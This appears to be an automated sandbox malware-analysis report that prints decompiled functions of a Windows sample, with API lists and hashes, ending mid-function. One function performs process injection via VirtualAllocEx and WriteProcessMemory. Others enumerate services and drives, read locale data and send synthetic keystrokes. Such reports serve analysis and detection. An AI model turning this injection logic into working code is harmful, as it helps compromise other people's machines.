                                    Uniqueness Score: -1.00%

                                    Function 240547C8, Relevance: 6.1, APIs: 4, Instructions: 100memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E240547C8(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _v8;
				intOrPtr _v12;
				char _v13;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				intOrPtr _v36;
				long _v44;
				void* _v48;
				void* _t42;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr* _t80;

				_t80 = _t79 + 0xffffffd4;
				_v12 = __edx;
				_v8 = __eax;
				_t64 =  *0x24053e90; // 0x24053e94
				E240139CC( &_v48, _t64);
				_push(_t79);
				_push(0x240548d9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t80;
				_v13 = 0;
				_push(0);
				_push(_v12);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
				_t76 = 0x10000000;
				do {
					_t76 = _t76 + 0x10000;
					_t57 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40);
					if(_t57 != 0) {
						VirtualFree(_t57, 0, 0x8000);
						_t57 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40);
					}
				} while (_t57 == 0 && _t76 <= 0x30000000);
				E24054594(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48);
				_t42 = _v48;
				if(_t42 != 0) {
					_v24 = _t42;
					_v20 = _v36;
					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28);
					if(E24053F80(_v8,  &_v24, E240547A0, 0, 8) != 0) {
						_v13 = 1;
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x240548e0);
				_t68 =  *0x24053e90; // 0x24053e94
				return E24013A90( &_v48, _t68);
			}





















                                    0x240547cb
                                    0x240547d1
                                    0x240547d4
                                    0x240547da
                                    0x240547e0
                                    0x240547e7
                                    0x240547e8
                                    0x240547ed
                                    0x240547f0
                                    0x240547f3
                                    0x240547fc
                                    0x240547fd
                                    0x24054804
                                    0x24054808
                                    0x2405480f
                                    0x24054811
                                    0x24054816
                                    0x24054816
                                    0x24054832
                                    0x24054836
                                    0x24054840
                                    0x2405485f
                                    0x2405485f
                                    0x24054861
                                    0x24054879
                                    0x2405487e
                                    0x24054883
                                    0x24054885
                                    0x2405488b
                                    0x2405489c
                                    0x240548b7
                                    0x240548b9
                                    0x240548b9
                                    0x240548b7
                                    0x240548bf
                                    0x240548c2
                                    0x240548c5
                                    0x240548cd
                                    0x240548d8

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 2405482D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 24054840
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 2405485A
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 2405489C
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: d5f8063f5f91ac3d7fc71000dfc2d61ec1e27825b76a9bca2b070aaf16389528
                                    • Instruction ID: f9a1d8d58b9378a61539a176628ee232f011176e0f68df887de7f00a52302c69
                                    • Opcode Fuzzy Hash: d5f8063f5f91ac3d7fc71000dfc2d61ec1e27825b76a9bca2b070aaf16389528
                                    • Instruction Fuzzy Hash: F1311B71A00245ABEB41CBA9CC81FDEB7F9FB98704F508065E904F7654D674EA508BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403D390, Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2403D390(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E24013534(__eax),  &_v336);
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                    0x2403d3ab
                                    0x2403d3b3
                                    0x2403d3e9
                                    0x2403d3e9
                                    0x2403d3b5
                                    0x2403d3b6
                                    0x2403d3c2
                                    0x00000000
                                    0x2403d3c4
                                    0x2403d3cf
                                    0x2403d3e7
                                    0x00000000
                                    0x00000000
                                    0x2403d3e7
                                    0x2403d3c2
                                    0x2403d3f7

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 2403D3AB
                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 2403D3B6
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 2403D3CF
                                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 2403D3E0
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                    • String ID:
                                    • API String ID: 2659516521-0
                                    • Opcode ID: 9143006eb41c45353f1fb9a1df9d4207309235395cb7662632e7840d83c7f675
                                    • Instruction ID: 3ce7e5e080b836565f60ce50e2410eadfe5ebaa2cb47f093869fe9eb88b8ed4d
                                    • Opcode Fuzzy Hash: 9143006eb41c45353f1fb9a1df9d4207309235395cb7662632e7840d83c7f675
                                    • Instruction Fuzzy Hash: FEF012B6D0020C66DB11DBE58C84ACFB7EC5F04214F5006A6E559E22D5EB34AB845BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403C9E0, Relevance: 4.6, APIs: 3, Instructions: 134serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E2403C9E0(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _ENUM_SERVICE_STATUS _v18452;
				char _v18456;
				char _v18460;
				char _v18464;
				char _v18468;
				char _v18472;
				char _v18476;
				void* _t37;
				intOrPtr* _t77;
				intOrPtr _t83;
				void* _t99;
				void* _t100;
				intOrPtr* _t102;
				void* _t104;
				void* _t105;

				_t104 = _t105;
				_push(__eax);
				_t37 = 4;
				do {
					_t105 = _t105 + 0xfffff004;
					_push(_t37);
					_t37 = _t37 - 1;
				} while (_t37 != 0);
				_v18472 = 0;
				_v18476 = 0;
				_v18464 = 0;
				_v18468 = 0;
				_v18460 = 0;
				_v18456 = 0;
				_t102 = _v8;
				_push(_t104);
				_push(0x2403cbbc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff7dc;
				E24013088(_t102);
				_v8 = OpenSCManagerA(0, 0, 5);
				if(_v8 == 0) {
					L16:
					_pop(_t83);
					 *[fs:eax] = _t83;
					_push(0x2403cbc3);
					return E240130AC( &_v18476, 6);
				}
				_v20 = 0;
				do {
					EnumServicesStatusA(_v8, 0x13f, 3,  &_v18452, 0x4800,  &_v12,  &_v16,  &_v20);
					_t99 = _v16 - 1;
					if(_t99 < 0) {
						goto L13;
					}
					_t100 = _t99 + 1;
					_t77 =  &_v18452;
					do {
						if( *_t77 != 0) {
							_push( *_t102);
							E24013274( &_v18456,  *_t77);
							_push(_v18456);
							_push(0x2403cbe0);
							E240133FC();
						} else {
							E24013344(_t102, 0x2403cbd4);
						}
						_t113 =  *((intOrPtr*)(_t77 + 4));
						if( *((intOrPtr*)(_t77 + 4)) != 0) {
							_push( *_t102);
							E24013274( &_v18460,  *((intOrPtr*)(_t77 + 4)));
							_push(_v18460);
							_push(0x2403cbe0);
							E240133FC();
						} else {
							E24013344(_t102, 0x2403cbd4);
						}
						_push( *_t102);
						E24013274( &_v18468,  *_t77);
						E2403C6E4(_v18468, _t77,  &_v18464, _t102, _t113);
						_push(_v18464);
						_push(0x2403cbd4);
						E240133FC();
						_push( *_t102);
						E24013274( &_v18476,  *_t77);
						E2403C858(_v18476, _t77, 0, 0, _t100, _t102, _t113,  &_v18472);
						_push(_v18472);
						_push(0x2403cbd4);
						E240133FC();
						_t77 = _t77 + 0x24;
						_t100 = _t100 - 1;
					} while (_t100 != 0);
					L13:
				} while (_v12 != 0);
				if(_v8 > 0) {
					CloseServiceHandle(_v8);
				}
				goto L16;
			}






















                                    0x2403c9e1
                                    0x2403c9e3
                                    0x2403c9e4
                                    0x2403c9e9
                                    0x2403c9e9
                                    0x2403c9ef
                                    0x2403c9f0
                                    0x2403c9f0
                                    0x2403ca01
                                    0x2403ca07
                                    0x2403ca0d
                                    0x2403ca13
                                    0x2403ca19
                                    0x2403ca1f
                                    0x2403ca25
                                    0x2403ca29
                                    0x2403ca2a
                                    0x2403ca2f
                                    0x2403ca32
                                    0x2403ca37
                                    0x2403ca47
                                    0x2403ca4e
                                    0x2403cb9e
                                    0x2403cba0
                                    0x2403cba3
                                    0x2403cba6
                                    0x2403cbbb
                                    0x2403cbbb
                                    0x2403ca56
                                    0x2403ca59
                                    0x2403ca7c
                                    0x2403ca84
                                    0x2403ca87
                                    0x00000000
                                    0x00000000
                                    0x2403ca8d
                                    0x2403ca8e
                                    0x2403ca94
                                    0x2403ca97
                                    0x2403caa7
                                    0x2403cab1
                                    0x2403cab6
                                    0x2403cabc
                                    0x2403cac8
                                    0x2403ca99
                                    0x2403caa0
                                    0x2403caa0
                                    0x2403cacd
                                    0x2403cad1
                                    0x2403cae1
                                    0x2403caec
                                    0x2403caf1
                                    0x2403caf7
                                    0x2403cb03
                                    0x2403cad3
                                    0x2403cada
                                    0x2403cada
                                    0x2403cb08
                                    0x2403cb12
                                    0x2403cb23
                                    0x2403cb28
                                    0x2403cb2e
                                    0x2403cb3a
                                    0x2403cb3f
                                    0x2403cb50
                                    0x2403cb5f
                                    0x2403cb64
                                    0x2403cb6a
                                    0x2403cb76
                                    0x2403cb7b
                                    0x2403cb7e
                                    0x2403cb7e
                                    0x2403cb85
                                    0x2403cb85
                                    0x2403cb93
                                    0x2403cb99
                                    0x2403cb99
                                    0x00000000

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000005,00000000,2403CBBC), ref: 2403CA42
                                    • EnumServicesStatusA.ADVAPI32(00000000,0000013F,00000003,?,00004800,?,?,?), ref: 2403CA7C
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000005,00000000,2403CBBC), ref: 2403CB99
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                    • String ID:
                                    • API String ID: 236840872-0
                                    • Opcode ID: 2f159192f6f5311a94a8c082e9fddeb7910a1b84486832ce6392bffb3023f4ba
                                    • Instruction ID: 3208abff47b8b951bbf0e3629c18cb63830b94082d3141814c16408f3c07f88e
                                    • Opcode Fuzzy Hash: 2f159192f6f5311a94a8c082e9fddeb7910a1b84486832ce6392bffb3023f4ba
                                    • Instruction Fuzzy Hash: 635152B29041589BEF11DB64CC40B8DBFF9EF58704F10C9E69208E6258DAB19FC18F55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24018DE0, Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E24018DE0(void* __eax, void* __ebx, void* __eflags) {
				char _v14;
				char _v78;
				char _v142;
				char _v148;
				char _v160;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				intOrPtr _t92;
				void* _t96;
				void* _t98;

				_t98 = __eflags;
				_v180 = 0;
				_v184 = 0;
				_v176 = 0;
				_v148 = 0;
				_push(_t96);
				_push(0x24018f57);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96 + 0xffffff4c;
				GetKeyboardLayoutNameA( &_v14);
				E24011BD8( &_v160, 0x24018f64);
				E240122F4( &_v172, 0xa,  &_v14);
				E24011BA8( &_v160, 0xb,  &_v172);
				E240132E0( &_v148,  &_v160, _t98);
				GetLocaleInfoA(E240158F0(_v148, _t98), 0x1001,  &_v78, 0x40);
				E24011BD8( &_v160, 0x24018f64);
				E240122F4( &_v172, 0xa,  &_v14);
				E24011BA8( &_v160, 0xb,  &_v172);
				E240132E0( &_v176,  &_v160, _t98);
				GetLocaleInfoA(E240158F0(_v176, _t98), 2,  &_v142, 0x40);
				E240132EC( &_v180, 0x40,  &_v78);
				_push(_v180);
				_push(0x24018f70);
				E240132EC( &_v184, 0x40,  &_v142);
				_push(_v184);
				_push(E24018F7C);
				E240133FC();
				_pop(_t92);
				 *[fs:eax] = _t92;
				_push(E24018F5E);
				E240130AC( &_v184, 3);
				return E24013088( &_v148);
			}















                                    0x24018de0
                                    0x24018dec
                                    0x24018df2
                                    0x24018df8
                                    0x24018dfe
                                    0x24018e08
                                    0x24018e09
                                    0x24018e0e
                                    0x24018e11
                                    0x24018e18
                                    0x24018e33
                                    0x24018e46
                                    0x24018e59
                                    0x24018e6a
                                    0x24018e7b
                                    0x24018e96
                                    0x24018ea9
                                    0x24018ebc
                                    0x24018ecd
                                    0x24018ede
                                    0x24018ef1
                                    0x24018ef6
                                    0x24018efc
                                    0x24018f12
                                    0x24018f17
                                    0x24018f1d
                                    0x24018f29
                                    0x24018f30
                                    0x24018f33
                                    0x24018f36
                                    0x24018f46
                                    0x24018f56

                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 24018E18
                                    • GetLocaleInfoA.KERNEL32(00000000,00001001,?,00000040,00000000,24018F57), ref: 24018E7B
                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000040,00000000,00001001,?,00000040,00000000,24018F57), ref: 24018EDE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale$KeyboardLayoutName
                                    • String ID:
                                    • API String ID: 3953094008-0
                                    • Opcode ID: ea93da08cd9a7f21511e1b6b6dbd34542b1c10a26204852ee03e686afca071c4
                                    • Instruction ID: 398bf9705c7740406d98461d9edb960ea2f3f4af33ccd85f9738524941cd585b
                                    • Opcode Fuzzy Hash: ea93da08cd9a7f21511e1b6b6dbd34542b1c10a26204852ee03e686afca071c4
                                    • Instruction Fuzzy Hash: 2B311B71A002199FEF14DB61CC80FCDB3BAAF58304F4084E5960CA7159EB75AF8A8E55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2404092C, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 40%
                                    			E2404092C(intOrPtr* __eax, void* __ebx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				CHAR* _t24;
				void* _t25;
				intOrPtr _t32;
				intOrPtr* _t35;
				intOrPtr _t38;

				_push(0);
				_push(0);
				_t35 = __eax;
				_push(_t38);
				_push(0x240409c9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				E24013088(__eax);
				_t24 = E24011344(0x200);
				GetLogicalDriveStringsA(0x200, _t24);
				SetErrorMode(1);
				while( *_t24 != 0) {
					_push( *_t35);
					E24013274( &_v8, _t24);
					_push(_v8);
					_push(0x240409e0);
					E240158BC( &_v12, _t25, 0, GetDriveTypeA(_t24), 0);
					_push(_v12);
					_push(0x240409e0);
					E240133FC();
					_t24 =  &(_t24[4]);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x240409d0);
				return E240130AC( &_v12, 2);
			}










                                    0x2404092f
                                    0x24040931
                                    0x24040935
                                    0x24040939
                                    0x2404093a
                                    0x2404093f
                                    0x24040942
                                    0x24040947
                                    0x24040956
                                    0x2404095e
                                    0x24040965
                                    0x240409a9
                                    0x2404096c
                                    0x24040973
                                    0x24040978
                                    0x2404097b
                                    0x2404098d
                                    0x24040992
                                    0x24040995
                                    0x240409a1
                                    0x240409a6
                                    0x240409a6
                                    0x240409b0
                                    0x240409b3
                                    0x240409b6
                                    0x240409c8

                                    APIs
                                    • GetLogicalDriveStringsA.KERNEL32(00000200,00000000), ref: 2404095E
                                    • SetErrorMode.KERNEL32(00000001,00000000,240409C9,?,?,?,00000000,00000000), ref: 24040965
                                    • GetDriveTypeA.KERNEL32(00000000,240409E0,?,?,00000001,00000000,240409C9,?,?,?,00000000,00000000), ref: 24040981
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Drive$ErrorLogicalModeStringsType
                                    • String ID:
                                    • API String ID: 2040483995-0
                                    • Opcode ID: dc2863e7846e029cd5b70a756a15143f719e1668bcdb54b0c8e55056709f6d43
                                    • Instruction ID: e6463fc05f44022da83336afd5d5cc247bb4ca06b09e5ea39e8653920cccdc44
                                    • Opcode Fuzzy Hash: dc2863e7846e029cd5b70a756a15143f719e1668bcdb54b0c8e55056709f6d43
                                    • Instruction Fuzzy Hash: 5401D471A042047FFB129AE0DC91F6E769CDB95704F510475F604B6689D9749EC04AA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24044968, Relevance: 3.1, APIs: 2, Instructions: 60keyboardCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E24044968(char __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				void* _t33;
				intOrPtr _t46;
				void* _t50;

				_v12 = 0;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t50);
				_push(0x24044a1a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff8;
				while(E24013674(0x24044a30, _v8) > 0) {
					__eflags = E24013674(0x24044a30, _v8) - 1;
					E24013590(_v8, E24013674(0x24044a30, _v8) - 1, 1,  &_v12);
					_t33 = E240158F0(_v12, __eflags);
					E240135D0( &_v8, E24013674(0x24044a30, _v8), 1);
					_push(0);
					_push(0);
					_push(1);
					_push(_t33);
					L24015448();
					_push(0);
					_push(2);
					_push(1);
					_push(_t33);
					L24015448();
				}
				_pop(_t46);
				 *[fs:eax] = _t46;
				_push(0x24044a21);
				return E240130AC( &_v12, 2);
			}








                                    0x24044971
                                    0x24044974
                                    0x2404497a
                                    0x24044981
                                    0x24044982
                                    0x24044987
                                    0x2404498a
                                    0x240449ee
                                    0x240449a2
                                    0x240449ab
                                    0x240449b8
                                    0x240449d1
                                    0x240449d6
                                    0x240449d8
                                    0x240449da
                                    0x240449dc
                                    0x240449dd
                                    0x240449e2
                                    0x240449e4
                                    0x240449e6
                                    0x240449e8
                                    0x240449e9
                                    0x240449e9
                                    0x24044a01
                                    0x24044a04
                                    0x24044a07
                                    0x24044a19

                                    APIs
                                    • keybd_event.USER32(00000000,00000001,00000000,00000000), ref: 240449DD
                                    • keybd_event.USER32(00000000,00000001,00000002,00000000), ref: 240449E9
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: keybd_event
                                    • String ID:
                                    • API String ID: 2665452162-0
                                    • Opcode ID: 531780a9b425e5e394f734af701528f3fe364af5c59b0903d52d1c6e01404d02
                                    • Instruction ID: 18c1be857b599704aa82fbad4382f21e07f79cfa042db71c8f6a274bd4253aff
                                    • Opcode Fuzzy Hash: 531780a9b425e5e394f734af701528f3fe364af5c59b0903d52d1c6e01404d02
                                    • Instruction Fuzzy Hash: 50118A30B04204ABFF11DBA4CC91B9EB3E9EB58708F608170A405F77D9EAB4DF909655
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240334CC, Relevance: 1.6, Strings: 1, Instructions: 368COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E240334CC(signed int __eax, signed int __ecx, signed short* __edx, signed short* _a4, signed int* _a8, intOrPtr* _a12) {
				signed int _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed short _v50;
				char _v51;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed short* _v72;
				char _v74;
				char _v102;
				char _v104;
				char _v134;
				short* _t236;
				signed short* _t237;
				short* _t239;
				signed int _t241;
				intOrPtr* _t242;
				signed int _t248;
				signed short _t265;
				signed int _t266;
				signed int _t288;
				signed int _t289;
				signed short _t297;
				signed int _t312;
				signed int _t319;
				void* _t338;
				signed int _t343;
				short _t348;
				signed short* _t349;
				signed int _t354;
				signed int _t358;
				signed int _t359;
				signed int _t363;
				signed int _t364;
				intOrPtr _t369;
				unsigned int _t375;
				intOrPtr* _t382;
				intOrPtr* _t383;
				signed int _t386;
				void* _t389;

				_t289 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				_t236 =  &_v104;
				do {
					 *_t236 = 0;
					_v16 = _v16 + 1;
					_t236 = _t236 + 2;
				} while (_v16 <= 0xf);
				_t338 = 0;
				_t237 = _v12;
				if(__ecx <= 0) {
					L4:
					_t239 =  &_v74;
					_v28 =  *_a8;
					_v24 = 0xf;
					while( *_t239 == 0) {
						_v24 = _v24 - 1;
						_t239 = _t239 + 0xfffffffe;
						if(_v24 >= 1) {
							continue;
						}
						break;
					}
					if(_v28 > _v24) {
						_v28 = _v24;
					}
					if(_v24 != 0) {
						_v20 = 1;
						_v72 =  &_v102;
						while(1) {
							__eflags =  *_v72;
							if( *_v72 != 0) {
								break;
							}
							_v20 = _v20 + 1;
							_v72 =  &(_v72[1]);
							__eflags = _v20 - 0xf;
							if(_v20 <= 0xf) {
								continue;
							}
							break;
						}
						__eflags = _v28 - _v20;
						if(_v28 < _v20) {
							_v28 = _v20;
						}
						_v16 = 1;
						_t343 = 1;
						_t241 =  &_v102;
						while(1) {
							_t343 = _t343 + _t343 - ( *_t241 & 0x0000ffff);
							__eflags = _t343;
							if(_t343 < 0) {
								break;
							}
							_v16 = _v16 + 1;
							_t241 = _t241 + 2;
							__eflags = _v16 - 0xf;
							if(_v16 <= 0xf) {
								continue;
							}
							__eflags = _t343;
							if(_t343 <= 0) {
								L24:
								_v134 = 0;
								_v16 = 1;
								_t242 =  &_v134;
								_v72 =  &_v102;
								do {
									 *((short*)(_t242 + 2)) =  *_t242 +  *_v72;
									_t242 = _t242 + 2;
									_v16 = _v16 + 1;
									_v72 =  &(_v72[1]);
									__eflags = _v16 - 0xf;
								} while (_v16 < 0xf);
								_t348 = 0;
								_v72 = _v12;
								__eflags = _t289;
								if(_t289 <= 0) {
									L30:
									__eflags = _v8 - 1;
									if(__eflags < 0) {
										_t349 = _a4;
										_v64 = _t349;
										_v60 = _t349;
										_v68 = 0x13;
									} else {
										if(__eflags == 0) {
											_v60 = 0x24057e84;
											_v60 = _v60 - 0x202;
											_v64 = 0x24057ec2;
											_v64 = _v64 - 0x202;
											_v68 = 0x100;
										} else {
											_v60 = 0x24057f00;
											_v64 = 0x24057f40;
											_v68 = 0xffffffff;
										}
									}
									_v16 = _v20;
									_t386 = 0;
									_v56 =  *_a12;
									_t248 = _v28;
									_v32 = 0;
									_v44 = 0xffffffff;
									_v36 = 1 << _v28;
									_v48 = _v36 - 1;
									__eflags = _v8 - 1;
									if(_v8 != 1) {
										L39:
										_v72 = _a4;
										while(1) {
											_v51 = _v16 - _v32;
											_t297 =  *_v72;
											_t354 = _t297 & 0x0000ffff;
											__eflags = _t354 - _v68;
											if(_t354 >= _v68) {
												__eflags = _t354 - _v68;
												if(_t354 <= _v68) {
													_v52 = 0x60;
													_v50 = 0;
												} else {
													_v52 =  *((intOrPtr*)(_v64 + _t354 * 2));
													_v50 =  *((intOrPtr*)(_v60 + _t354 * 2));
												}
											} else {
												_v52 = 0;
												_v50 = _t297;
											}
											__eflags = 1;
											_v40 = 1 << _t248;
											_v20 = _v40;
											do {
												L46:
												_v40 = _v40 - 1;
												 *((intOrPtr*)(_v56 + ((_t386 >> _v32) + _v40) * 4)) = _v52;
												__eflags = _v40;
											} while (_v40 != 0);
											_t358 = 1 << _v16 - 1;
											while(1) {
												__eflags = _t358 & _t386;
												if((_t358 & _t386) == 0) {
													break;
												}
												_t358 = _t358 >> 1;
												__eflags = _t358;
											}
											__eflags = _t358;
											if(_t358 == 0) {
												_t386 = 0;
												__eflags = 0;
											} else {
												_t386 = (_t386 & _t358 - 0x00000001) + _t358;
											}
											_v72 =  &(_v72[1]);
											_t359 = _v16;
											 *(_t389 + _t359 * 2 - 0x64) =  *(_t389 + _t359 * 2 - 0x64) - 1;
											__eflags =  *(_t389 + _t359 * 2 - 0x64);
											if( *(_t389 + _t359 * 2 - 0x64) != 0) {
												L56:
												__eflags = _v16 - _v28;
												if(_v16 <= _v28) {
													continue;
													do {
														do {
															_v51 = _v16 - _v32;
															_t297 =  *_v72;
															_t354 = _t297 & 0x0000ffff;
															__eflags = _t354 - _v68;
															if(_t354 >= _v68) {
																__eflags = _t354 - _v68;
																if(_t354 <= _v68) {
																	_v52 = 0x60;
																	_v50 = 0;
																} else {
																	_v52 =  *((intOrPtr*)(_v64 + _t354 * 2));
																	_v50 =  *((intOrPtr*)(_v60 + _t354 * 2));
																}
															} else {
																_v52 = 0;
																_v50 = _t297;
															}
															__eflags = 1;
															_v40 = 1 << _t248;
															_v20 = _v40;
															goto L46;
														} while (_v16 <= _v28);
														goto L57;
													} while ((_v48 & _t386) == _v44);
													__eflags = _v32;
													if(_v32 == 0) {
														_v32 = _v28;
													}
													_v56 = _v56 + (_v20 << 2);
													_t248 = _v16 - _v32;
													_t363 = 1 << _t248;
													while(1) {
														_t312 = _v32 + _t248;
														__eflags = _t312 - _v24;
														if(_t312 >= _v24) {
															break;
														}
														_t364 = _t363 - ( *(_t389 + _t312 * 2 - 0x64) & 0x0000ffff);
														__eflags = _t364;
														if(_t364 <= 0) {
															break;
														}
														_t248 = _t248 + 1;
														_t363 = _t364 + _t364;
														__eflags = _t363;
													}
													_v36 = _v36 + (1 << _t248);
													__eflags = _v8 - 1;
													if(_v8 != 1) {
														L67:
														_v44 = _v48 & _t386;
														_t369 =  *_a12;
														 *(_t369 + _v44 * 4) = _t248;
														 *((char*)(_t369 + 1 + _v44 * 4)) = _v28;
														_t319 = _v56 - _t369;
														__eflags = _t319;
														if(_t319 < 0) {
															_t319 = _t319 + 3;
															__eflags = _t319;
														}
														 *((short*)(_t369 + 2 + _v44 * 4)) = _t319 >> 2;
														continue;
													}
													__eflags = _v36 - 0x5b0;
													if(_v36 < 0x5b0) {
														goto L67;
													}
													return 1;
												}
												L57:
												__eflags = (_v48 & _t386) - _v44;
											} else {
												__eflags = _v16 - _v24;
												if(_v16 == _v24) {
													_v52 = 0x40;
													_v51 = _v16 - _v32;
													_v50 = 0;
													__eflags = _t386;
													if(_t386 == 0) {
														L81:
														 *_a12 =  *_a12 + (_v36 << 2);
														 *_a8 = _v28;
														__eflags = 0;
														return 0;
													} else {
														goto L71;
													}
													do {
														L71:
														__eflags = _v32;
														if(_v32 != 0) {
															__eflags = (_v48 & _t386) - _v44;
															if((_v48 & _t386) != _v44) {
																__eflags = 0;
																_v32 = 0;
																_v16 = _v28;
																_v56 =  *_a12;
																_v51 = _v16;
															}
														}
														 *((intOrPtr*)(_v56 + (_t386 >> _v32) * 4)) = _v52;
														_t375 = 1 << _v16 - 1;
														while(1) {
															__eflags = _t375 & _t386;
															if((_t375 & _t386) == 0) {
																goto L77;
															}
															_t375 = _t375 >> 1;
															__eflags = _t375;
														}
														L77:
														__eflags = _t375;
														if(_t375 == 0) {
															_t386 = 0;
															__eflags = 0;
														} else {
															_t386 = (_t386 & _t375 - 0x00000001) + _t375;
														}
														__eflags = _t386;
													} while (_t386 != 0);
													goto L81;
												}
												_v16 = _v12[ *_v72 & 0x0000ffff] & 0x0000ffff;
												goto L56;
											}
										}
									} else {
